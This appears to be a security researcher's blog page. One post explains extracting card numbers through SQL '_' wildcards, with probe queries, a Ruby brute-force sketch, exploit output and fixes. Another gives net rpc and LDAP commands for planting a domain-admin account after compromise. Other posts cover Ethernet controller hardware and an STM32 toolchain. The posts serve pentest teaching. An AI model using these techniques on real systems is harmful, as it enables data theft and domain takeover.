Josh Stone, Blog

Josh’s projects and security nerdery

SQL Wildcard Quirks

I found a neat vulnerability the other day, and I thought I’d write about it here. It’s actually an issue I’ve found before and have known about for at least 10 years, but for some reason I can’t find much discussion of it on the Internet. Since my reports provide references to additional resources so a customer can research and best understand my recommendations, I was disappointed not to find a good writeup of the issues you can encounter when you don’t filter all SQL wildcards.

Specifically, this blog post is about the underscore (“_”). Almost everyone is familiar with the “%” wildcard, which represents any arbitrary sequence of characters in a “like” query. Slightly less well-known is the “_” wildcard, which represents exactly one character. For example, if we have a table in a database that has my name in it, we could search for something like this (the underscore matches any single character, so this still finds “Josh Stone”):

SELECT * FROM USERS WHERE NAME LIKE "J_sh Stone"
Even if you’re using parameterized queries, it may still be possible for a user to submit wildcards, and the results can be significant, depending on the particulars. OWASP discusses some query timing issues that make for an interesting DoS in OWASP-DS-001. That matters if you care about availability, but there’s also a potential impact to confidentiality.

Say, for example, that your application stores and processes credit card numbers. You have carefully ensured that when card data is displayed, it is always shown masked, so that a user can’t harvest the numbers. It’ll usually look something like this:

Masked PANs

It might be necessary at times to be able to search for a credit card number. But that’s OK, because if someone’s going to search for it, then they already know the number, right? As long as we don’t let someone search for partial numbers, then we shouldn’t have any issues. Consider a code snippet something like this:

get '/search/card/:pan' do
  if params[:pan].length == 16
    rows = $db.execute("select * from cards where pan like ?", [params[:pan]])
    content = list_customers(rows)
    $header + content + $footer
  else
    $header + "<h2>ERROR: must search for full card number!</h2>" + $footer
  end
end

Here we check to make sure that the user has submitted a full 16-digit number, and we aren’t putting “%” wildcards around the value in our like query, so this should only return the rows where the card number matches. In case you’re not a Ruby aficionado, here’s the query (the “?” gets replaced with the submitted value):

SELECT * FROM CARDS WHERE PAN LIKE "4111111111111111"
This is where underscores suddenly become important. For example, suppose the credit card number is 4111111111111111. We can search for something like this, and it will still return the correct result:

SELECT * FROM CARDS WHERE PAN LIKE "411111111111111_"
With enough queries, this is enough to extract all of the card numbers from the database. We can search for a candidate that consists of all “_” characters except one digit; with successive queries, we can determine the value of each digit in the number. Here’s an example:

SELECT * FROM CARDS WHERE PAN LIKE "0_______________" -> 0 rows
SELECT * FROM CARDS WHERE PAN LIKE "1_______________" -> 0 rows
SELECT * FROM CARDS WHERE PAN LIKE "2_______________" -> 0 rows
SELECT * FROM CARDS WHERE PAN LIKE "3_______________" -> 0 rows
SELECT * FROM CARDS WHERE PAN LIKE "4_______________" -> 1 row
SELECT * FROM CARDS WHERE PAN LIKE "40______________" -> 0 rows
SELECT * FROM CARDS WHERE PAN LIKE "41______________" -> 1 row
SELECT * FROM CARDS WHERE PAN LIKE "410_____________" -> 0 rows
. . .

And so on. By submitting “_” characters, we satisfy the requirements of the SQL query, and can evaluate the responses to brute-force the entire credit card number. For all 16 digits, this happens in an average of 80 requests. If this is a web application, this happens in a matter of seconds.
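The digit-by-digit loop is simple enough to sketch. Here’s a minimal, self-contained Ruby version, where `search` and `SECRET_PAN` are hypothetical stand-ins for the vulnerable endpoint (in a real attack, `search` would issue the HTTP request and check whether any rows came back):

```ruby
# SECRET_PAN and search() are stand-ins: in the real attack, search() would be
# an HTTP request to the vulnerable /search/card/<pattern> endpoint, and the
# attacker only learns whether the search matched.
SECRET_PAN = "4111111111111111"

def search(pattern)
  # A LIKE pattern containing only digits and "_" behaves like this regex
  regex = Regexp.new("\\A" + pattern.gsub("_", ".") + "\\z")
  regex.match?(SECRET_PAN)
end

# Recover the PAN one digit at a time, always submitting a full-length pattern
pan = ""
16.times do
  pan += ("0".."9").find { |d| search(pan + d + "_" * (15 - pan.length)) }
end

puts pan   # prints 4111111111111111
```

Each digit costs at most ten guesses (about five on average), which is where the 80-request average comes from.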

For kicks, I put together a sample application that is vulnerable in this way (the code snippet from above comes from this example). It can be a fun exercise to write an exploit that mines all the card data from the application. You can get the sample application here, and an example exploit script here. Here’s an example run:

:) josh@atlantis-desktop $ ruby exploit.rb http://localhost:4567/ admin admin 4013

 CDE Buster - Brute Force PANs with '_' Wildcards - Josh Stone (C) 2015

  [-] Brute forcing PANs with prefix '4013'
  [+] 4013066436049272 -> 000001,Mary,Walker,4013********9272
  [+] 4013095262568113 -> 000016,Robert,Lopez,4013********8113
  [+] 4013142736227502 -> 000010,Thomas,Harris,4013********7502
  . . .
  [+] 4013973448854765 -> 000024,Richard,Thomas,4013********4765
  [+] 4013988348405260 -> 000011,Margaret,Robinson,4013********5260
  [+] 4013994852743575 -> 000022,Robert,Hall,4013********3575
  [-] Enumerated 25 PANs in 1830 requests

:) josh@atlantis-desktop $ 

The solution is better input filtering. Since these are credit card numbers, a filter should ensure that every character is numeric. At a minimum, you could remove or escape “_” characters, or return an error message if they appear in the input.
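To make that concrete, here’s a sketch of both approaches in plain Ruby (the method names are mine, not from the sample application):

```ruby
# Option 1: strict validation -- a card search must be exactly 16 digits.
def valid_pan?(input)
  input.match?(/\A\d{16}\z/)
end

# Option 2: if user input must reach a LIKE clause, escape the wildcard
# characters ("%", "_") and the escape character itself, then pair the
# query with an ESCAPE clause, e.g.:  ... WHERE pan LIKE ? ESCAPE '\'
def escape_like(input)
  input.gsub(/[\\%_]/) { |c| "\\" + c }
end

puts valid_pan?("4111111111111111")   # true
puts valid_pan?("4_______________")   # false
puts escape_like("4_______________")  # underscores come out backslash-escaped
```

With either fix in place, the all-underscores probes above simply stop matching.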

Ethernet Parallel I/O

This is a post in a series about my Ethernet Project

In my last post, I talked a little about the Ethernet interface options in the hobby microcontroller world. Most of the time, these chips will use an SPI interface, which simplifies connectivity to the processor. SPI uses only a handful of lines to communicate serially, and can operate at pretty high speeds in many cases. In the Arduino world, SPI is usually limited to some fraction of the processor speed. It may also be further limited by the maximum specifications for the chip. So, for example, the ENC424J600, which I’ve selected, has an SPI mode that maxes out at 14MHz. This is a tad slow – some chips support more like 20-30MHz, but still, this is far slower than Ethernet line speed.

If I want to go full speed, I need to find something else. That’s one of the neat things about the ENC424J600 – it features a parallel I/O interface (PIO), which allows for much faster throughput than the SPI. There are several different schemes for using the PIO, and they range from ~80 megabits per second to 160 (only achievable with the bigger-brother ENC624, BTW). If I can get anywhere near 80 megabits, I’ll be pretty happy, considering that I’m talking about a small device that should end up costing something like $10-12.

Parallel I/O increases speed by multiplying the number of data lines. With a serial interface, you double the bit rate by doubling the clock frequency; with PIO, you can instead double the number of lines. In its most basic mode, the ENC424 supports an 8-bit bus, with up to 14 bits used for addressing. This means that on every read you get a full byte. Based on the timing specifications in the data sheet, this allows for near-80-megabit speeds, which is pretty nice in a $3 chip.

Even that paragraph above is a little simplified. There are 10 PIO modes documented (only 2 of which apply to the 44-pin ENC424), and then there are several addressing options that make it even more flexible (which also means more complicated). You choose which mode you’re going to use by tying some of the ENC424’s pins low or high. E.g., I’m using PIO mode 5, so I tie the SPISEL pin low (this enables PIO), and then tie the PSPCFG0 pin low (indicating mode 5, not 6). So what does it really look like to interface with this chip?

You can imagine that the ENC424 is a big memory chip. It possesses about 24 kilobytes of memory total, and most of it can be used for whatever you want. You could even use it just for its memory if you wanted to be silly! But some memory locations are special, defining registers that control the configuration and behavior of the chip. By reading and writing these special registers, we can configure all of our ethernet options, determine when packets have arrived, and instruct the chip to send a packet when we want to. And with this memory model, the packet data just lives in the rest of memory, so we have one common, consistent interface to the chip.

To use the PIO interface, we have to consider several things. First, there’s the physical connectivity. We need the 8 data lines, of course, that make up the bus. But there are also a number of control signals. Their function depends on which PIO mode we choose to use. All of my testing has been around using PIO mode 5. This uses read, write, and address latching signals in addition to the chip select signal. Here’s a diagram from the data sheet showing how they are supposed to work for a read operation:

Timing Diagram

Here’s a basic description for each signal:

  1. AL – this is the address latching signal. When it pulses high, the ENC424 will read a memory address from the data bus, which will influence what it does next. So, if you want to access the ECON1H register (the high byte of the first ethernet control register), you would configure the address 0x7e1f on the bus. This is obviously more than one byte, which is why there are actually 14 lines on the bus.
  2. RD – this is the read signal, causing the chip to configure the data lines as an output (relative to the ENC424), containing the values stored in the memory location that was last latched with an “AL” pulse. There are also some fancy auto-incrementing features (which I’ll get into in a later post) that allow you to do multiple reads with only one latch, and walk through memory.
  3. WR – similar to RD, this signal instructs the ENC424 to read data from the bus to write to the latched memory address. If you want to update the contents of memory, you set the address with AL, then put the data you want to write on the bus, then pulse this line.
  4. CS – this is the chip select line, which tells the chip that it should start watching the data lines for instructions. This is very handy if you have more than one chip on your bus – be they more ENC424s or something else with a parallel bus interface. You can actually get away with just tying this to a logic high and never changing it if the ENC424 is the only chip on the bus. But once I get to making inline devices that have multiple interfaces, this will be an invaluable feature.

Here’s a nearly useless picture of what it looks like. I’ll probably go into the PCB design for the breakout in a future blog post.


Based on the timing diagram above, here’s a very simple function for the Teensy 3.1 that reads a byte from the ENC424. Note that this is not exactly the code I end up using in my projects, because there’s this thing called the “indirect” addressing mode that saves all those extra address pins. But I’ll get into that later. Here’s how to read from chip memory:

unsigned short ENC424::read_addr(unsigned short addr) {
  unsigned short ret = 0;

  GPIOC_PDDR = 0xff;                   // Set port C as output
  GPIOC_PDOR = addr & 0xff;            // Send low byte of address to port C
  GPIOD_PDOR = (addr & 0xff00) >> 8;   // Send high byte of address to port D
  digitalWriteFast(ENC_CS, HIGH);      // Raise chip select to activate chip
  digitalWriteFast(ENC_AL, HIGH);      // Raise AL to signal address is ready
  digitalWriteFast(ENC_AL, LOW);       // Drop AL to latch memory address
  digitalWriteFast(ENC_RD, HIGH);      // Raise RD to instruct ENC424 to fetch
  GPIOC_PDDR = 0;                      // Set port C as input for reading from the bus
  nop; nop; nop; nop; nop;             // Wait out the chip's access time (see below)
  ret = GPIOC_PDIR;                    // Read response from the bus
  digitalWriteFast(ENC_RD, LOW);       // Drop RD to complete read instruction
  digitalWriteFast(ENC_CS, LOW);       // Drop CS to complete operation

  return ret;
}
The function above assumes that the data bus is populated on the port C pins (15, 22, 23, 9, 10, 13, 11, 12 on the Teensy 3.1), and that the additional 7 address lines are connected to port D pins. The string of “nop” calls causes the processor to do nothing for five clocks. This gives the ENC424 time to fetch the data from memory and write it out to the bus. The data sheet specifies this delay to be at least 75 nanoseconds (Tpsp2), which comes out to 5.4 clock cycles on the 72MHz Teensy 3.1. The GPIOC_PDDR = 0 line above the nops takes at least one more cycle, so this makes sure we give the ENC424 enough time.

With that as basic groundwork, here’s an example of reading the register page from the ENC424 (these are all the memory addresses that start with 0x7exx). We use code something like this:

    void ENC424::printRegisters() {
      int i;
      Serial.printf("\nReading register map starting at 0x7e00\n");
      for(i = 0x7e00; i <= 0x7eff; i++) {
        if(i % 16 == 0) Serial.printf("\n%04x: ", i);
        byte val = read_addr(i);
        Serial.printf("%02x ", val);
      }
      Serial.printf("\n");
    }

Reading register map starting at 0x7e00

7e00: 00 00 00 00 00 10 fe 19 00 10 00 00 00 00 00 00 
7e10: 00 00 00 00 00 00 34 12 ff 5f 00 da 00 0f 01 00 
7e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
7e30: 00 00 00 00 af 00 34 12 ff 5f 00 da 00 0f 01 00 
7e40: 0d 80 b2 40 12 00 12 0c 0f 37 00 dc 00 10 00 00 
7e50: 20 00 00 00 00 01 34 12 ff 5f 00 da 00 0f 01 00 
7e60: 35 05 39 11 d8 80 00 00 00 00 00 00 00 10 02 eb 
7e70: 0f 10 10 88 21 26 34 12 ff 5f 00 da 00 0f 01 00 
7e80: 63 ca 63 ca 63 ca 02 06 00 00 02 06 50 01 02 06 
7e90: 00 00 00 00 34 80 05 35 11 39 80 d8 00 00 21 20 
7ea0: 80 04 08 49 00 00 00 00 00 00 00 00 00 00 00 00 
7eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
7ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
7ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
7ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
7ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

Of course, all of those values have meanings, which I’ll get into in a future blog post. And that demonstrates successful communication with the chip!

Ethernet Hardware Project

I’ve had a little dream for many years about getting my hands on Ethernet at the lowest possible level. Alright, maybe not quite as low as some – I don’t need to hit the physical layer quite like project Daisho. But I want to have nothing between myself and the packets on the wire. In some ways, perhaps this is a foolish project, since we really can do what we want with packets using tools like Scapy, which I’ve used to good effect in my DHCP-exhaustion and 802.1x projects in the past. But even so, here are a few reasons for this project:

  • Sometimes operating systems still get in the way (even Linux!)
  • Pure knowledge
  • Throw-away devices
  • Making absolute guarantees

That last one is probably the most compelling. For example, suppose you’re hacking a network with very aggressive port security. Have you ever had your port killed because something leaked a packet with a bad MAC address? It could have been forgetting that a VM was configured with a bridged interface when you un-suspended it, or maybe you misconfigured something in a tool like Yersinia.

Or consider when you have a network with DAI enabled with ARP rate limiting. Everything’s going fine until you accidentally run a metasploit module that includes more than 10 boxes in your subnet, and then your port is borked for five minutes. What if you could guarantee that your box literally cannot send more than 9 ARP packets per second?

Throw-away devices are another interesting one. I can’t rationally sacrifice something that costs as much as a BeagleBone Black on a fire-and-forget physical attack. Granted, that’s not usually in my rules of engagement… but what is research for, anyway? If I can make a throw-away ethernet device for $10, that gets into discretionary territory, for sure. Think of malicious sensors planted in different subnets, etc.

But really, it’s probably the second one that drives me on this project more than anything else. In all areas, I want to be able to confidently say I understand the full stack of technologies that drive the networks I need to assess. You really can’t think creatively about what attacks might be available unless you truly understand how everything works. Maybe some really useful, practical applications will emerge as I play with this project. Maybe not. In any case, I’ll probably be a smarter guy by the time I’m done with it.

I’m going to use this post to keep track of the various blog posts about this project – check back for new ones as they emerge!

Ethernet Hardware Options

This is a post in a series about my Ethernet Project

So I want to play hands-on with Ethernet. I thought it would be worth pointing out some of the hardware choices I’ve made for this project, especially considering the other ways that people do small-scale ethernet. I’m targeting something that’s about Arduino complexity, so that ecosystem is a good place to start.

There are a bunch of ethernet boards out there. For example, there’s the classic Ethernet Shield. This will run about $10-20 or so, and will pair well with any standard Arduino. In my case, though, this isn’t really a good option for several reasons. First, it’s based on a highly integrated solution, the Wiznet 5100, which takes the whole TCP/IP stack over for you, and provides a serial “sockets-like” interface. While very cool for doing Internet of Things projects with your Arduino, it’s not so good for what I’m aiming for. I think there might be some raw packet options, but by the time you factor in the SPI interface and everything, it’s just not the ideal solution.

There are some breakout boards based on the Microchip ENC28J60 chip, which is a nice SPI-based combination MAC and PHY. These work well, but are somewhat limited in speed – the SPI interface is capped at 20MHz, which means you can’t get more than 20 megabits per second out of it. That isn’t such a big deal, but there’s another very nice option…

There’s the ENC28J60’s bigger brother, the ENC424J600, which has a snazzy parallel interface. The timings for the ENC424 allow a microcontroller to approach a full 80 megabits per second, which is pretty close to what anyone will practically see on a real network. If I want to build a man-in-the-middle inline device or something, this should be about ideal.

Another key consideration is the processor. I can’t do this with an 8-bit AVR, such as is used in most Arduinos, because they don’t have enough memory. If you have only 3KB of RAM, you’re not going to be able to store many packets in memory! The ARM Cortex microcontrollers, however, usually have many kilobytes of RAM and run at nice, fast speeds (like 100MHz+). That gives me the horsepower I need to implement a TCP/IP stack, keep packets in memory, and make decisions about what to do with those packets in real-time!

Create Domain Accounts Variously

I find myself creating Active Directory accounts fairly often. But of course I’m never doing it as a genuine domain administrator. That means I might not have MMC available to me – or maybe not even an RDP session! This blog post summarizes a few approaches I’ve found handy in various situations.

All of these methods assume that I have somehow obtained a domain administrator account, so this isn’t “exploitation” so much as “post exploitation”. In this case, I’m going to be adding an account named eve to the domain EMPIRE via the domain controller palpatine. There are certainly other methods (e.g., WMI, though I’ve never been driven to use it to create a user thus far; or PSEXEC, which I use all the time, but isn’t all that exciting), so this is not exhaustive.

The Samba net Command, Part I

Samba includes a net command that’s very similar to the traditional Microsoft utility of the same name. It’s more powerful in many ways, though. If the domain is configured “normally”, then the net command should work just fine. It goes something like this:

# net -U EMPIRE\\administrator%Password1 -S palpatine rpc user add eve Password1
Added user 'eve'.
# net -U EMPIRE\\administrator%Password1 -S palpatine rpc group addmem "Domain Admins" eve

The Samba net Command, Part II

I’ve had at least one occasion where this did not work. I had compromised a protected network by obtaining a domain admin credential and finding a host that could communicate with the domain controller only on port 445/TCP. Handy, but the above commands didn’t work. Later, I found that the administrators had hardened the domain controller in some unusual ways, one of which crippled a number of RPC calls required to accomplish the above. Not to be outdone, I found another way using some net functionality that still worked for me:

# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service create PWN PWN \
    "cmd /c start /b cmd /c net user /domain /add eve Password1"
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service start PWN
Query status request failed.  [WERR_SERVICE_REQUEST_TIMEOUT]
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service delete PWN
Successfully deleted Service: PWN

Then add the user to the Domain Admins group:

# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service create PWN PWN \
    "cmd /c start /b cmd /c net group /domain /add \"Domain Admins\" eve"
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service start PWN
Query status request failed.  [WERR_SERVICE_REQUEST_TIMEOUT]
# net -W EMPIRE -U EMPIRE\\administrator%Password1 -S palpatine rpc service delete PWN
Successfully deleted Service: PWN

Manually via LDAP

Occasionally, I will find a scenario where I don’t have access to useful ports like SMB (445/TCP), but I do have access to LDAP. In this case, you can still create a domain admin, but it’s a little tricky. There are some howtos on the Internet that you can piece together to get there, but here’s the quick way:

  1. Make sure you have ldap-utils installed
  2. Create a local ldaprc file that disables certificate checking
  3. Create an LDIF file that describes the new user:
    1. First, create the user as a disabled account and no password
    2. Set the password with a Base64-encoded UTF-16LE value
    3. Enable the account
    4. Add the account to the “Domain Admins” group
  4. Use ldapmodify (or one of its friends) to run the LDIF file
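For concreteness, here’s roughly what that LDIF could look like for the eve example above. This is a sketch, not the output of my script: the unicodePwd value is the Base64 of the UTF-16LE encoding of “Password1” (including the required surrounding double quotes), userAccountControl 514 is a disabled normal account and 512 an enabled one, and setting unicodePwd only works over an encrypted connection (hence the ldaprc certificate tweak):

```ldif
dn: CN=eve,CN=Users,DC=empire,DC=local
changetype: add
objectClass: user
sAMAccountName: eve
userAccountControl: 514

dn: CN=eve,CN=Users,DC=empire,DC=local
changetype: modify
replace: unicodePwd
unicodePwd:: IgBQAGEAcwBzAHcAbwByAGQAMQAiAA==

dn: CN=eve,CN=Users,DC=empire,DC=local
changetype: modify
replace: userAccountControl
userAccountControl: 512

dn: CN=Domain Admins,CN=Users,DC=empire,DC=local
changetype: modify
add: member
member: CN=eve,CN=Users,DC=empire,DC=local
```

Feed a file like this to ldapmodify with -f, and it performs the same add/modify sequence.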

I have written a handy script for this, which makes it look something like this:

# ruby ldapcreate.rb palpatine EMPIRE administrator DC=empire,DC=local eve Password1

-=-=-= LDAP Admin Creator =-=-=-
by Josh Stone

Enter LDAP Password: 
adding new entry "CN=eve,CN=Users,DC=empire,DC=local"

modifying entry "CN=eve,CN=Users,DC=empire,DC=local"

modifying entry "CN=eve,CN=Users,DC=empire,DC=local"

modifying entry "CN=Domain Admins,CN=Users,DC=empire,DC=local"

GCC Toolchain for Mbed on STM32F411RE Nucleo

This blog post is what I wanted to find on the Internet when I bought my new Nucleo STM32F411RE microcontroller board. I am absolutely pumped about working with this board. I have done some experimentation with the ARM Cortex microcontrollers (primarily with a Teensy USB 3.1), but I have some projects that require me to step it up and enter this world a little more thoroughly.

The Nucleo is a fantastic board – a 100MHz ARM Cortex-M4 (with FPU), half a megabyte of flash, all I/O ports exposed, and only $10.33 at Mouser! After playing with it enough to get the hang of it, I am convinced that this is a really powerful platform, and under-appreciated for what it is.


You can’t talk about the Nucleo boards without mentioning the mbed environment. This is a cloud-based IDE/compiler environment where various ARM Cortex manufacturers provide “back-end” drivers for their chips, and everything gets abstracted nicely behind a very high-level API. At first, I was worried that this was on the level of the Arduino training wheels, but the more I play with it, the more powerful I realize it is.

There are some blogs that suggest that Real Men™ code to the bare metal and eschew even STM’s hardware abstraction layer. But this is really premature optimization. If you have any familiarity with the Arduino software environment, the MBED API will seem similar enough. But there’s actually a lot more power here, since all of the hardware platforms conform to a higher level of basic functionality than the MCUs used on the Arduinos.

But… there’s a drawback. MBED is cloud-based, and the platform has drawn criticism, perhaps rightly so, for originally forcing developers to use the Internet-access-only environment. Well, times have changed somewhat, and you can use the MBED SDK offline. For me, since I do lots of coding while traveling, this is a necessary feature since I don’t always have access to the Internet. Plus, I don’t necessarily like the idea of my code being controlled by someone else (until I publish it, of course!).

But therein is another hurdle. Most of the environments you’ll see for offline MBED development are not so open-source and GNU/Linux friendly. Some are outright expensive. Almost all of them are Windows-only. And a few are free trials, which never sits well with me. I want Emacs, a compiler, and a Makefile. That’s what this blog is about – how to get your MBED code into a position where you can program your way and get things done in Linux.

Compilers and Libraries

You’ll need a couple things to compile code for the ARM Cortex CPU and support the software library expectations of the MBED SDK. These include an ARM embedded ABI (EABI) cross-compiler and the newlib base library. In Ubuntu 14.04, this worked well for me:

josh@ubuntu:~$ sudo apt-get install gcc-arm-none-eabi libnewlib-arm-none-eabi
josh@ubuntu:~$ sudo apt-get install g++-4.8-multilib

But there’s one more hurdle. If you’re an LTS user like me (got burned on those .10 releases long ago!), you’ll find that there’s a quirk in the current packages for 14.04. Some header files will be missing. This can be fixed a few ways, but I found the quickest way was to install the libstdc++-arm-none-eabi-newlib package manually (it’s not in the repositories). I’m not going to say this is the best way to do it, but it worked for me:

josh@ubuntu:~$ wget
josh@ubuntu:~$ sudo dpkg -i libstdc++-arm-none-eabi-newlib_4.8.3-11ubuntu1+4_all.deb 


We also need something that can access the JTAG / SWD functionality on the Nucleo board. This is best done with OpenOCD. There is a package in the Ubuntu repository for this, but it doesn’t come with definitions for all the Nucleo boards. This is the kind of software you want to compile yourself anyway to stay up to date, though, so I installed it from the Github repository. Here’s how it went for me.

Install some prerequisites:

josh@ubuntu:~/nucleo/openocd$ sudo apt-get install libtool
josh@ubuntu:~/nucleo/openocd$ sudo apt-get install automake
josh@ubuntu:~/nucleo/openocd$ sudo apt-get install libusb-1.0-0-dev

Download the Github repository:

josh@ubuntu:~/nucleo$ git clone
Cloning into 'openocd'...
remote: Counting objects: 49390, done.
remote: Total 49390 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (49390/49390), 13.56 MiB | 1.46 MiB/s, done.
Resolving deltas: 100% (40608/40608), done.
Checking connectivity... done.

Bootstrap the compilation process:

josh@ubuntu:~/nucleo$ cd openocd
josh@ubuntu:~/nucleo/openocd$ ./bootstrap
+ aclocal
+ libtoolize --automake --copy
+ autoconf
+ autoheader
+ automake --gnu --add-missing --copy
installing './compile'
installing './config.guess'
installing './config.sub'
installing './install-sh'
installing './missing'
warning: wildcard $(srcdir: non-POSIX variable name
. . .

Run configure. I include some more output here because you want to make sure that you have lots of “yes” autoconfigurations. If you didn’t install the right libusb-1.0-0-dev package or something else is missing, you may not be able to connect to devices. Make sure this looks something like what’s below:

josh@ubuntu:~/nucleo/openocd$ ./configure
checking for makeinfo... no
configure: WARNING: Info documentation will not be built.
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /bin/mkdir -p
checking for gawk... gawk
checking whether make sets $(MAKE)... yes
checking whether make supports nested variables... yes
. . .
jim-config.h is unchanged
jimautoconf.h is unchanged
Created Makefile from
Created build-jim-ext from

OpenOCD configuration summary
MPSSE mode of FTDI based devices        yes (auto)
ST-Link JTAG Programmer                 yes (auto)
TI ICDI JTAG Programmer                 yes (auto)
Keil ULINK JTAG Programmer              yes (auto)
Altera USB-Blaster II Compatible        yes (auto)
Versaloon-Link JTAG Programmer          yes (auto)
Segger J-Link JTAG Programmer           yes (auto)
OSBDM (JTAG only) Programmer            yes (auto)
eStick/opendous JTAG Programmer         yes (auto)
Andes JTAG Programmer                   yes (auto)
USBProg JTAG Programmer                 no
Raisonance RLink JTAG Programmer        no
Olimex ARM-JTAG-EW Programmer           no
CMSIS-DAP Compliant Debugger            no


Now make and install the package:

josh@ubuntu:~/nucleo/openocd$ make && sudo make install
. . .
make  install-data-hook
make[3]: Entering directory `/home/josh/nucleo/openocd'
for i in $(find ./tcl -name '*.cfg' -o -name '*.tcl' -o -name '*.txt' | sed -e 's,^./tcl,,'); do \
        j="/usr/local/share/openocd/scripts/$i" && \
        mkdir -p "$(dirname $j)" && \
        /usr/bin/install -c -m 644 ./tcl/$i $j; \
make[3]: Leaving directory `/home/josh/nucleo/openocd'
make[2]: Leaving directory `/home/josh/nucleo/openocd'
make[1]: Leaving directory `/home/josh/nucleo/openocd'


I don’t know if this is necessary, but stlink is another tool you can use to communicate directly with STM’s st-link interfaces. Start by downloading the repository from Github:

josh@ubuntu:~/nucleo$ git clone 
Cloning into 'stlink'...
remote: Counting objects: 4364, done.
remote: Total 4364 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (4364/4364), 13.31 MiB | 2.09 MiB/s, done.
Resolving deltas: 100% (2704/2704), done.
Checking connectivity... done.

Generate the configure script, compile, and install it:

josh@ubuntu:~/nucleo/stlink$ ./
josh@ubuntu:~/nucleo/stlink$ ./configure
josh@ubuntu:~/nucleo/stlink$ make && sudo make install

Here’s why stlink might be a good idea to have installed. It comes with some UDEV rules that will make sure that Linux does the right thing when you plug the USB port in:

josh@ubuntu:~/nucleo/stlink$ sudo cp 49-stlinkv2-1.rules /etc/udev/rules.d/
josh@ubuntu:~/nucleo/stlink$ sudo service udev restart
udev stop/waiting
udev start/running, process 4291

MBED Code Export

Now we have what we need to compile code. What we need next is some code to compile! The MBED web site really is very cool. There are a number of basic programs you can start with and manipulate. At any time you can compile the code and download a binary to write to the flash on your microcontroller. But what we’re interested in is the export feature. This will let us get a fully-functional MBED environment that we can use for offline development.

I’ll assume that you can create an account on the MBED web site – it’s just a username and password like anywhere else. Once you have the account, make sure you add your hardware platform to your profile. This is important because the MBED SDK is a front-end API that has to have hardware-specific drivers on the back end to make it work with your hardware. It’s chip-specific, so make sure you choose the right one. Navigate to the “Platform” section, search for the device you have (I’m using an STM32F411RE), and make sure it’s added to your profile like below:

Now, enter the “Compiler” part of the site and create a new program (“New” -> “New Program”). Make sure your hardware platform is selected, and choose something simple like the “Blink LED” program. Selecting it should look something like this:

Now export the code to a file. The MBED supports lots of different targets, but the one we’re interested in is the GCC ARM environment. These screenshots should help you get to the right spot:

I’m sure everyone knows how to unzip the file, but for completeness, here’s how I got it unpacked:

josh@ubuntu:~$ mkdir nucleo
josh@ubuntu:~$ cd nucleo
josh@ubuntu:~/nucleo$ unzip ~/Downloads/
Archive:  /home/josh/Downloads/
  inflating: Nucleo_blink_led/mbed.bld  
  inflating: Nucleo_blink_led/main.cpp  
  inflating: Nucleo_blink_led/.hgignore  
  inflating: Nucleo_blink_led/Makefile  
  inflating: Nucleo_blink_led/mbed/analogout_api.h  
  . . .

Fix the Makefile

This step may vary for different Linux distributions and releases. I found that on Ubuntu 14.04 there were a few issues with include directories, etc. There may be cleaner ways to make this work, but I found that adding the right flags in the Makefile made everything compile. If you don’t do this, then make will give you errors, and you’ll have to figure out what to do.

Open the Makefile in an editor and look for the line where INCLUDE_PATHS is defined. Add two more -I... flags to the end of it so that it ends with something like this (note: keep it all on one line, without any backslashes or newlines; I’ve wrapped it here only so it fits on the screen):

-I/usr/include/newlib/c++/4.8 -I/usr/include/newlib/c++/4.8/arm-none-eabi/

There is also a --specs flag that needs to be changed. Find the definition of LD_FLAGS and make it look something like this:

LD_FLAGS = $(CPU) -Wl,--gc-sections --specs=nosys.specs -u _printf_float -u _scanf_float

Compile your Program

Now it should compile with a straightforward make. If not, then look back above and make sure you did everything to this point. It’s also possible that you have other unique system configurations that get in the way, so look closely at the error messages. I include the full output here so you have as much information as possible:

josh@ubuntu:~/nucleo/Nucleo_blink_led$ make
make: Warning: File `main.cpp' has modification time 2.8e+04 s in the future
arm-none-eabi-g++ -mcpu=cortex-m4 -mthumb -mfpu=fpv4-sp-d16 -mfloat-abi=softfp -c -g -fno-common -fmessage-length=0 -Wall -fno-exceptions -ffunction-sections -fdata-sections -fomit-frame-pointer -MMD -MP -DNDEBUG -Os -DTARGET_NUCLEO_F411RE -DTARGET_M4 -DTARGET_CORTEX_M -DTARGET_STM -DTARGET_STM32F4 -DTARGET_STM32F411RE -DTOOLCHAIN_GCC_ARM -DTOOLCHAIN_GCC -D__CORTEX_M4 -DARM_MATH_CM4 -D__FPU_PRESENT=1 -DMBED_BUILD_TIMESTAMP=1417383839.53 -D__MBED__=1 -DTARGET_FF_ARDUINO -DTARGET_FF_MORPHO  -std=gnu++98 -fno-rtti -I. -I./mbed -I./mbed/TARGET_NUCLEO_F411RE -I./mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM -I./mbed/TARGET_NUCLEO_F411RE/TARGET_STM -I./mbed/TARGET_NUCLEO_F411RE/TARGET_STM/TARGET_NUCLEO_F411RE -I/usr/include/newlib/c++/4.8 -I/usr/include/newlib/c++/4.8/arm-none-eabi -o main.o main.cpp
